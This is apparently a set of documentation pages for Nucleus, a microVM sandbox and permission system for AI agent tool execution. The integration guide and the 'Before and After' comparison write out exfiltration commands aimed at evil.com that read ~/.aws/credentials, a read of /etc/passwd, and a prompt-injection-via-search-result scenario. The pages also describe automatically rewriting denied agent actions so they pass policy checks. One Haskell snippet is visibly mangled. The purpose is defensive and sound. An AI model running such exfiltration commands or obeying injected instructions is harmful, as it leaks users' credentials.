Persistent memory	Lattice-guard detects uninhabitable state combinations

Integration Guide

Prerequisites

Linux host with KVM, or macOS with Lima VM (M3+ for nested virt)
OpenClaw gateway running

Step 1: Install Nucleus

# From source
git clone https://github.com/coproduct-opensource/nucleus
cd nucleus
cargo install --path crates/nucleus-node
cargo install --path crates/nucleus-cli

# Setup (generates secrets, configures VM)
nucleus setup
nucleus doctor  # Verify installation

Step 2: Configure OpenClaw Exec Backend

In your OpenClaw configuration (~/.openclaw/config.yaml):

exec:
  backend: nucleus
  nucleus:
    endpoint: "http://127.0.0.1:8080"
    workspace: "/path/to/safe/workspace"
    timeout_seconds: 300

    # Permission profile (see nucleus docs)
    profile: "openclaw-restricted"

Step 3: Define Permission Profile

Create ~/.config/nucleus/profiles/openclaw-restricted.toml:

[filesystem]
# Only allow access to workspace
allowed_paths = ["/workspace"]
denied_paths = ["**/.env", "**/*.pem", "**/*secret*"]

[network]
# Allowlist for OpenClaw's typical integrations
allowed_hosts = [
  "api.openai.com",
  "api.anthropic.com",
  "api.github.com",
  "*.googleapis.com",
]
denied_hosts = ["*"]  # Deny by default

[capabilities]
# No shell execution, no privilege escalation
allow_shell = false
allow_sudo = false
allow_network_bind = false

Step 4: Start Services

# Terminal 1: Start nucleus-node
nucleus-node --config ~/.config/nucleus/config.toml

# Terminal 2: Start OpenClaw gateway (will use nucleus backend)
openclaw gateway start

Step 5: Verify Isolation

Test that the sandbox is working:

# This should fail - /etc/passwd is outside workspace
openclaw exec "cat /etc/passwd"
# Expected: Permission denied

# This should work - workspace access allowed
openclaw exec "ls /workspace"
# Expected: Directory listing

# This should fail - network not in allowlist
openclaw exec "curl http://evil.com/exfil"
# Expected: Network error or timeout

Security Guarantees

Guarantee	Mechanism
Filesystem isolation	Firecracker VM with mapped `/workspace` only
Network isolation	Linux network namespace, iptables egress rules
Request authenticity	HMAC-SHA256 signing of all requests
Approval audit	Cryptographically chained audit log
Secret protection	Credentials in macOS Keychain, never in VM
Uninhabitable state detection	Lattice-guard alerts on dangerous combinations

What Nucleus Does NOT Protect Against

Be aware of limitations:

Prompt injection itself — Nucleus sandboxes execution, not the LLM
Data in workspace — Files explicitly shared are accessible
Approved network targets — Allowlisted hosts can still receive exfiltrated data
Side-channel attacks — Timing, power analysis not mitigated
Malicious workspace files — If you put secrets in workspace, they’re exposed

Nucleus is defense-in-depth, not a silver bullet. It dramatically reduces blast radius but cannot make an unsafe agent safe.

Comparison: Before and After

Before: OpenClaw Default

Attack: Prompt injection via web search result
  → Agent executes: curl http://evil.com/x?key=$(cat ~/.aws/credentials)
  → Result: AWS credentials exfiltrated

Attack: Malicious attachment
  → Agent executes: python malware.py
  → Result: Ransomware on host system

After: With Nucleus

Attack: Prompt injection via web search result
  → Agent requests: curl http://evil.com/x?key=$(cat ~/.aws/credentials)
  → nucleus-node: Network destination not in allowlist
  → nucleus-node: ~/.aws/credentials not in allowed paths
  → Result: Request denied, logged, alert raised

Attack: Malicious attachment
  → Agent requests: python malware.py
  → nucleus-node: Executes in isolated VM
  → VM: No access to host filesystem
  → VM: No network egress to C2 server
  → Result: Malware contained, host unaffected

Framework-Agnostic Integration

While this guide focuses on OpenClaw, nucleus provides the same isolation guarantees for any agent framework that executes tools on a host system:

Framework	Integration Method	Status
OpenClaw	TypeScript plugin (`openclaw-nucleus-plugin`)	Production
Custom Rust agents	`nucleus-sdk` crate (`Nucleus::intent()` API)	Production
Any HTTP agent	REST API to `nucleus-node`	Production
MCP-compatible agents	MCP tool server (planned)	Roadmap

The core principle is the same regardless of framework: tool execution happens inside an isolated Firecracker microVM, and the permission lattice governs what’s allowed.

Enterprise AI Agents

Compliance-ready AI agent execution with audit trails and NIST-aligned security.

Enterprise Requirements

Requirement	Challenge	Nucleus Solution
Audit trails	Prove what agent did and when	Cryptographic hash-chained logs
Data isolation	PII/PHI can’t leak to LLM providers	Execution in air-gapped VM
Least privilege	Agents shouldn’t have admin access	Capability-based permissions
Secret management	API keys must be rotated, protected	Keychain integration, 90-day rotation
Incident response	Forensic analysis after breach	Verifiable audit logs

Compliance Alignment

SOC 2

Control	Nucleus Feature
CC6.1 - Logical access	Lattice-guard permission boundaries
CC6.6 - System boundaries	Firecracker VM isolation
CC7.2 - Security events	nucleus-audit logging

HIPAA

Safeguard	Nucleus Feature
Access controls	Per-agent permission profiles
Audit controls	Cryptographic log verification
Integrity controls	Read-only rootfs, signed requests
Transmission security	HMAC-SHA256 request signing

NIST SP 800-57 (Key Management)

Requirement	Implementation
Key generation	32-byte cryptographically random secrets
Key storage	macOS Keychain (hardware-backed on Apple Silicon)
Key rotation	90-day tracking with warnings
Key destruction	Secure deletion via Keychain API

Architecture: Enterprise Deployment

┌─────────────────────────────────────────────────────────────────┐
│  Enterprise Network                                              │
│                                                                  │
│  ┌──────────────┐     ┌──────────────┐     ┌──────────────┐    │
│  │   AI Agent   │────▶│ nucleus-node │────▶│  Firecracker │    │
│  │  (internal)  │     │   cluster    │     │   VM pool    │    │
│  └──────────────┘     └──────────────┘     └──────────────┘    │
│         │                    │                    │             │
│         │                    ▼                    │             │
│         │             ┌──────────────┐            │             │
│         │             │ nucleus-audit│            │             │
│         │             │    (SIEM)    │            │             │
│         │             └──────────────┘            │             │
│         │                    │                    │             │
│         ▼                    ▼                    ▼             │
│  ┌─────────────────────────────────────────────────────────────┐│
│  │                     Audit Log Store                         ││
│  │  • Immutable append-only                                    ││
│  │  • SHA-256 hash chain                                       ││
│  │  • 7-year retention                                         ││
│  └─────────────────────────────────────────────────────────────┘│
└─────────────────────────────────────────────────────────────────┘

Audit Log Format

{
  "timestamp": "2026-01-31T14:23:45.123Z",
  "sequence": 1847,
  "previous_hash": "a3f2b1c4...",
  "event": {
    "type": "tool_execution",
    "agent_id": "agent-prod-047",
    "tool": "file_read",
    "target": "/workspace/report.csv",
    "result": "success",
    "bytes_returned": 4523
  },
  "signature": "hmac-sha256:e7d4a2f1..."
}

Verify log integrity:

nucleus-audit verify /var/log/nucleus/audit.log
# ✓ 1847 entries verified
# ✓ Hash chain intact
# ✓ No gaps detected

Deployment Options

On-Premises

# Kubernetes deployment
helm install nucleus nucleus/nucleus-node \
  --set replicas=3 \
  --set audit.storage=s3://company-audit-logs \
  --set secrets.backend=vault

Cloud (AWS/GCP/Azure)

Nucleus runs on any Linux VM with KVM support:

AWS: metal instances or Nitro-based (.metal suffix)
GCP: N2 with nested virtualization enabled
Azure: DCsv2/DCsv3 with nested virtualization

Getting Started

Security review: Share architecture docs with InfoSec
Pilot deployment: Single agent, non-production data
Audit integration: Connect nucleus-audit to SIEM
Production rollout: Gradual migration with monitoring

Contact: security@coproduct.dev for enterprise support.

We Audited Our Own Agent Platform

Terminology

This document captures brief, working definitions for terms used in the codebase and roadmap.

Firecracker

Firecracker is an open-source microVM monitor (AWS) focused on minimal device emulation, fast startup, and small memory footprint, exposing a REST control API and vsock/virtio devices for guest I/O. Source: https://firecracker-microvm.github.io/ Releases: https://github.com/firecracker-microvm/firecracker/releases

KVM (Kernel-based Virtual Machine)

KVM is a full virtualization solution in the Linux kernel that relies on hardware virtualization extensions (Intel VT or AMD-V) and provides kernel modules (kvm.ko plus CPU-specific modules) for running unmodified guest OSes. Source: https://linux-kvm.org/page/Main_Page

seccomp (Seccomp BPF)

Linux seccomp allows a process to filter its own system calls using BPF programs, reducing exposed kernel attack surface; it is a building block, not a full sandbox. Source: https://docs.kernel.org/userspace-api/seccomp_filter.html

cgroups (Control Groups, v2)

cgroup v2 provides a unified, hierarchical resource control interface (CPU, memory, I/O, etc.) with consistent controller semantics across the system. Source: https://docs.kernel.org/admin-guide/cgroup-v2.html

vsock (AF_VSOCK)

The VSOCK address family provides host<->guest communication that is independent of the VM’s network configuration, commonly used by guest agents and hypervisor services. Source: https://man7.org/linux/man-pages/man7/vsock.7.html

cap-std

cap-std provides a capability-based version of the Rust standard library, where access to filesystem/network/time resources is represented by values (capabilities) rather than ambient global access. Source: https://docs.rs/crate/cap-std/latest

Kani

Kani is a bit-precise model checker for Rust that can verify safety and correctness properties by exploring possible inputs and checking assertions/overflows/panics. Source: https://github.com/model-checking/kani

Temporal

Temporal is a scalable, reliable workflow runtime for durable execution of application code, enabling workflows that recover from failures without losing state. Source: https://docs.temporal.io/temporal

Model Context Protocol (MCP)

MCP is a JSON-RPC based protocol for exposing tools and context to AI applications via standardized client/server roles and capability negotiation. Source: https://modelcontextprotocol.io/specification/2025-11-25/basic

Temporal workflow sketch for nucleus pods

Goal: use Temporal to sequence agent steps (LangGraph-like) while Firecracker pods provide isolation.

Workflow outline

Create pod (activity: call nucleus-node /v1/pods or gRPC CreatePod).
Wait for pod ready (activity: poll /v1/pods or check proxy announce).
Run step(s) (activity: call tool-proxy /v1/run, /v1/read, /v1/write).
Approval gating (signal: ApprovalGranted -> activity: call /v1/approve).
Collect logs (activity: node /v1/pods/:id/logs).
Tear down (activity: cancel pod).

Example pseudo-flow

workflow AgentFlow(input) {
  pod = activity CreatePod(input.spec)
  activity WaitReady(pod)

  for step in input.graph:
    if step.requiresApproval:
      await signal ApprovalGranted
      activity Approve(pod.proxy, step.operation)

    result = activity RunTool(pod.proxy, step.toolCall)
    activity RecordResult(result)

  logs = activity FetchLogs(pod.id)
  activity CancelPod(pod.id)

  return { result, logs }
}

Recommended Temporal config

Each activity has a short timeout + retry policy.
Workflow uses idempotent activities (CreatePod returns existing pod if retried).
Signals are authenticated (signature/HMAC) to prevent fake approvals.
Use a per-pod workflow ID (pod UUID) for traceability.

Minimal integration points

Activity stubs for CreatePod, WaitReady, RunTool, Approve, FetchLogs, CancelPod.
HTTP client that signs requests (HMAC headers) to node/proxy.
Workflow state stores pod ID + proxy address.

Signer helpers

Rust: crates/nucleus-client provides sign_http_headers / sign_grpc_headers.
TypeScript: examples/sign_request.ts contains a minimal signer.

Theoretical Foundations

Nucleus is built on ideas from type theory, category theory, and programming language semantics. This document explains the “why” behind the design.

The Core Question

How do you give an AI agent enough capability to be useful while preventing it from exfiltrating your secrets?

This is not a data transformation problem (pipelines). It’s a capability tracking problem. The permission state isn’t data flowing through—it’s a constraint on what effects can even occur.

Graded Monads for Permission Tracking

The permission lattice is best understood as a graded monad (also called indexed or parameterized monad).

-- The grade 'p' is the permission lattice
newtype Sandbox p a = Sandbox (Policy p -> IO a)

-- Operations require specific capabilities
readFile  :: HasCap p ReadFiles  => Path -> Sandbox p String
webFetch  :: HasCap p WebFetch   => URL  -> Sandbox p Response
gitPush   :: HasCap p GitPush    => Ref  -> Sandbox p ()

-- Sequencing composes permissions via lattice MEET
(>>=) :: Sandbox p a -> (a -> Sandbox q b) -> Sandbox (p ∧ q) b

When you sequence operations, their permission requirements compose via the lattice meet operation. The resulting type carries the combined constraints.

Why Meet, Not Join?

Meet (∧) gives the greatest lower bound—the most restrictive combination. This ensures:

Monotonicity: Delegated permissions can only tighten, never relax
Least privilege: Combined operations get the intersection of capabilities
Compositionality: Order of composition doesn’t matter (meet is commutative)

The Uninhabitable state as a Type-Level Constraint

The “uninhabitable state” (private data + untrusted content + exfiltration) is not a runtime check bolted on. It’s a type-level invariant.

-- When all three legs are present, the type changes
type family uninhabitable stateGuard p where
  uninhabitable stateGuard p = If (Has Uninhabitable state p)
                       (RequiresApproval p)
                       p

-- Operations that can exfiltrate check this at the type level
gitPush :: uninhabitable stateGuard p ~ p => Ref -> Sandbox p ()

In Rust, we approximate this with runtime normalization (the ν function), but the intent is the same: certain capability combinations change the type of operations from “autonomous” to “requires approval.”

Free Monads for the Three-Player Game

The Strategist/Reconciler/Validator pattern maps to the free monad pattern: separate the description of a computation from its interpretation.

-- The functor describing sandbox operations
data SandboxF next
  = ReadFile Path (String -> next)
  | WriteFile Path String next
  | RunBash Command (Output -> next)
  | WebFetch URL (Response -> next)
  | GitPush Ref next

-- Free monad: a program is a sequence of operations
type SandboxProgram = Free SandboxF

-- Strategist: builds the program (pure)
strategist :: Issue -> SandboxProgram Plan

-- Reconciler: interprets with effects (IO)
reconciler :: SandboxProgram a -> Policy -> IO a

-- Validator: inspects the trace (pure)
validator :: Trace -> Verdict

This separation buys us:

Testability: Strategist output can be inspected without running effects
Replay: Programs can be re-interpreted against different policies
Auditing: The program structure is data, not opaque closures

Algebraic Effects for Temporal Workflows

Temporal workflows go beyond classic monads. They’re closer to algebraic effects:

effect CreatePod : PodSpec -> PodId
effect RunTool   : PodId * ToolCall -> ToolResult
effect AwaitSignal : SignalName -> SignalValue
effect Sleep     : Duration -> ()

handler workflow {
  return x -> Done(x)
  CreatePod(spec, k) -> persist(); pod <- firecracker(spec); k(pod)
  RunTool(pod, call, k) -> persist(); result <- proxy(pod, call); k(result)
  AwaitSignal(name, k) -> suspend(); await signal(name); k(value)
}

Effects can be:

Handled at different levels (activity retries vs workflow timeouts)
Intercepted (for logging, metering, approval injection)
Persisted (workflow state survives process crashes)
Compensated (rollback on failure)

This is more expressive than monad transformers because effects are first-class and can be handled non-locally.

The Monotone Envelope

Security posture should be monotone: it can only tighten or terminate, never silently relax.

                    time →
    ┌─────────────────────────────────────────┐
    │  Permissions                            │
    │  ████████████████████                   │  ← start
    │  ██████████████████                     │  ← delegation
    │  ████████████████                       │  ← budget consumed
    │  ██████████████                         │  ← time elapsed
    │  ████████████                           │  ← approval consumed
    │                     ×                   │  ← terminated
    └─────────────────────────────────────────┘

This is modeled as a monotone function on the permission lattice:

ν : L → L
where ∀p. ν(p) ≤ p  (deflationary)
  and ν(ν(p)) = ν(p)  (idempotent)

The normalization function ν can only move down the lattice (add obligations, reduce capabilities), never up.

Why Not Pipelines?

Unix pipelines are beautiful for data transformation:

cat file | grep pattern | sort | uniq

But they don’t model:

Capability requirements: grep doesn’t need different permissions than sort
Effect sequencing: Order matters for effects, not just data flow
Failure modes: Pipes abort; we need richer error handling
Context threading: Permissions, budget, time must flow through

Pipelines transform data. Monads sequence effects with context. Nucleus is about constraining which effects are expressible—that’s fundamentally effect-theoretic.

Practical Implications

For the Rust Implementation

#![allow(unused)]
fn main() {
// Capability requirements as trait bounds (graded monad style)
pub trait ToolOp {
    type Capability: CapabilityRequirement;
    fn execute<P: Policy>(self, policy: &P) -> Result<Output, PolicyError>
    where
        P: HasCapability<Self::Capability>;
}

// Workflow steps as an enum (free monad style)
pub enum WorkflowStep<T> {
    CreatePod(PodSpec, Box<dyn FnOnce(PodId) -> WorkflowStep<T>>),
    RunTool(PodId, ToolCall, Box<dyn FnOnce(ToolResult) -> WorkflowStep<T>>),
    AwaitSignal(String, Box<dyn FnOnce(Signal) -> WorkflowStep<T>>),
    Done(T),
}

// Permission composition via meet
impl<P: PermissionLattice, Q: PermissionLattice> Meet for (P, Q) {
    type Output = <P as Meet<Q>>::Output;
    fn meet(self) -> Self::Output { ... }
}
}

For Users

Think of Nucleus permissions as types, not configuration:

The permission lattice is like a type parameter
Operations have capability requirements like trait bounds
Sequencing operations composes their requirements
The uninhabitable state constraint is a type-level invariant, not a runtime check

References

Graded Monads - Katsumata, 2014
Algebraic Effects for Functional Programming - Leijen, 2016
Free Monads and Free Applicatives - Capriotti & Kaposi, 2014
Session Types - Honda et al., 1998
The Uninhabitable State - Simon Willison, 2025

Acknowledgments

The permission lattice design was influenced by capability-based security (Dennis & Van Horn, 1966), object-capability systems (Mark Miller’s E language), and Rust’s ownership model. The three-player game draws from formal verification’s approach to separating specification from implementation.

Theoretical Foundations

Formal structures underlying the nucleus security kernel. Each document describes the mathematical framework, its implementation in Rust, and its verification status (Lean proofs, Kani BMC, or unit tests).

Documents

Algebraic Structures — Unified Lattice trait hierarchy: 20 types, ProductLattice, MonotoneMap, generic verification harnesses, and the relationship between Rust traits and formal proofs.
Repair Algebra — Policy denial as program rewriting: retraction, Galois connection, and free-forgetful adjunction between raw and checked ActionTerms.
IFC Semilattice — The IFCLabel join operation as a bounded semilattice with covariant (confidentiality, provenance) and contravariant (integrity, authority) dimensions. Lean proofs in IFCSemilatticeProofs.lean. Implements Lattice trait.

Implemented (not yet documented)

Belnap Bilattice — Verdict in bilattice.rs. Four-valued policy logic with truth and knowledge orderings. Implements Lattice (truth axis) and BoundedLattice. De Morgan duality verified by unit tests.
Heyting Algebra — CapabilityLattice in heyting.rs. 13-dimensional product of bounded chains. Implements Lattice, BoundedLattice, DistributiveLattice, HeytingAlgebra. Adjunction verified by Kani.
Labeled Type System — Labeled<T, I, C> in labeled.rs. Compile-time IFC via phantom types. IntegAtLeast<Floor> and ConfAtMost<Ceiling> as subtyping constraints.
Discharge Witnesses — Discharged<O> in discharge.rs. Linear proof tokens with private Seal field. RepairHint for automated self-repair.
Galois Connections — TrustDomainBridge in galois.rs. Principled trust domain translation with adjunction verification.

Repair Algebra: Policy Denial as Program Rewriting

This document describes the categorical structure of the nucleus repair system — the RepairHint::try_repair() mechanism that transforms denied ActionTerms into admissible ones.

Overview

When preflight_action(term) returns Denied { hint }, the hint is not diagnostic text — it is a morphism in the category of ActionTerms. Applying it produces a new term that passes the specific obligation check that failed.

deny(term)                    → (reason, hint)
hint.try_repair(term)         → Some(repair)
preflight(repair.term())      → Allowed   (for the check that denied)

This is the first agent security framework where policy denial is a program transformation, not a dead end.

Layer 1: Retraction

For each obligation check C in {IntegrityGate, PathAllowed, DerivationClear, NoAdversarialAncestry, BudgetNotExceeded}, partition the ActionTerm space:

Pass_C = { t ∈ ActionTerm | check_C(t) = pass }
Fail_C = { t ∈ ActionTerm | check_C(t) = fail }

The repair function for check C is:

repair_C : Fail_C → Pass_C

This is a retraction — a left inverse of the inclusion Pass_C ↪ ActionTerm.

Idempotency: repair_C(repair_C(t)) = repair_C(t). A repaired term is already in Pass_C, so applying repair again is identity. This is tested by full_deny_repair_retry_loop: deny → repair → allow, and preflight on the repaired term never re-triggers the same check.

Implementation: each RepairHint variant maps to exactly one check and modifies only the fields that check examines:

Hint	Check	Fields modified
`RaiseIntegrity`	IntegrityGate	`artifact_label.integrity`
`CorrectOperationSinkPair`	PathAllowed	None (terminal — no auto-fix)
`PromoteDerivation`	DerivationClear	`artifact_label.derivation`
`DeclassifyOrReplaceInput`	NoAdversarialAncestry	`source_labels` (filter)
`WireBudgetGate`	BudgetNotExceeded	`estimated_cost_micro_usd`

Layer 2: Galois Connection

The obligation set S ⊆ Obligations induces a closure operator on ActionTerms:

Admit(S) = { t ∈ ActionTerm | ∀ C ∈ S, check_C(t) = pass }

Properties:

S₁ ⊆ S₂           ⟹  Admit(S₂) ⊆ Admit(S₁)         (antitone)
Admit(S₁ ∪ S₂)     =  Admit(S₁) ∩ Admit(S₂)          (intersection)
Admit(∅)            =  ActionTerm                       (vacuously true)
Admit(Obligations)  =  { t | preflight(t) = Allowed }  (fully constrained)

The repair system is the left adjoint:

Repair(S) : ActionTerm → Admit(S)

The Galois connection between the obligation lattice (ordered by ⊆) and the ActionTerm powerset (ordered by ⊆):

Repair(S)(t) ∈ Admit(S)   ⟺   t is repairable for S

Admit is the upper (right) adjoint. Repair is the lower (left) adjoint.

Composability theorem

Repairing for S₁ then S₂ equals repairing for S₁ ∪ S₂:

Repair(S₂)(Repair(S₁)(t)) = Repair(S₁ ∪ S₂)(t)

This holds because each repair_C modifies disjoint fields. The IntegrityGate repair touches artifact_label.integrity; the BudgetNotExceeded repair touches estimated_cost_micro_usd; the NoAdversarialAncestry repair touches source_labels. Since the field sets are disjoint, the repairs commute and compose.

Practical implication: if a term fails two checks, the agent can apply both repairs in any order and get the same result. There is no “repair ordering” problem.

Optimality

The repair is minimal — it modifies the fewest fields needed to enter Admit(S). This follows from the construction: each repair_C modifies exactly the field that C examines, and sets it to the minimum value that satisfies C.

For example, RaiseIntegrity sets artifact_label.integrity = required — the minimum integrity that passes IntegrityGate, not Trusted unconditionally.

Layer 3: Free-Forgetful Adjunction

Define two categories:

Raw — the category of “proposed actions”

Objects: ActionTerm values
Morphisms: field transformations (label changes, source filtering, cost adjustment)

Checked — the category of “authorized actions”

Objects: (ActionTerm, DischargedBundle) pairs
Morphisms: pairs of term transformations that preserve the bundle’s validity

Two functors connect them:

F : Raw → Checked       F(t) = (t, preflight(t))     when preflight succeeds
U : Checked → Raw       U(t, b) = t                   forgetful (drops proof)

The repair system provides the unit of the adjunction F ⊣ U:

η_t : t → U(F(Repair(t)))

For any raw term t:

If preflight(t) succeeds, η is identity (t is already in the image of F)
If preflight(t) fails with hint h, then η(t) = U(F(h.try_repair(t))) — the repair lifts t into Checked, and the forgetful functor projects back

The counit is trivial:

ε_(t,b) : F(U(t, b)) → (t, b)

A checked term, forgotten and re-checked, produces the same bundle (preflight is deterministic).

The triangle identities

U ε ∘ η U = id_U        (forget, re-check, forget = just forget)
ε F ∘ F η = id_F        (repair, check, check-the-repair = just check)

Both hold because:

Preflight is deterministic on the same term
Repair produces terms that pass preflight (retraction property)

The approval gate as a lifting condition

The NeedsApproval variant in Repair is where the adjunction “pauses.” The left adjoint has computed the target term in Checked, but the morphism from Raw to Checked factors through a human authorization gate:

            repair
  Raw ──────────────► Checked
   │                     ▲
   │                     │ approval (natural transformation)
   ▼                     │
  NeedsApproval ─────────┘

The approval gate is a natural transformation α : G → F where G is the “partially repaired” functor. Naturality means: approval commutes with further term transformations. If you modify a term after repair but before approval, the approval still applies — it’s the obligation that’s approved, not the specific term.

This is why Repair::NeedsApproval carries a gate: String describing the obligation, not the term: the approval is on the obligation class, not the instance.

Soundness Theorem (Informally)

For each RepairHint variant H and its corresponding check C:

∀ t ∈ ActionTerm,
  H.try_repair(t) = Some(Repair::Automatic(t'))  ⟹  check_C(t') = pass
  H.try_repair(t) = Some(Repair::NeedsApproval { term: t', .. })  ⟹  check_C(t') = pass
  H.try_repair(t) = None  ⟹  H = CorrectOperationSinkPair (structural, no auto-fix)

This is tested empirically by repair_budget_is_automatic_and_zeroes_cost, repair_adversarial_ancestry_strips_tainted_sources, and the end-to-end full_deny_repair_retry_loop. A Lean proof via Aeneas extraction is tracked as future work (#1209).

Relationship to Other Formal Structures

Structure	Where in nucleus	Role
Belnap bilattice	`bilattice.rs`	Policy verdict algebra
Heyting algebra	`CapabilityLattice`	Permission composition
IFC semilattice	`IFCLabel::join`	Taint propagation
Galois connection	Repair system	Obligation↔admissibility duality
Free-forgetful adjunction	Discharge + repair	Raw→checked canonical path
Retraction	Per-check repair	Idempotent deny→fix cycle

The repair algebra sits at the top of this hierarchy: it consumes the outputs of all other structures (IFC labels, capability checks, derivation classes) and provides the universal mechanism for converting policy denials into policy-compliant actions.

Keyboard shortcuts

Nucleus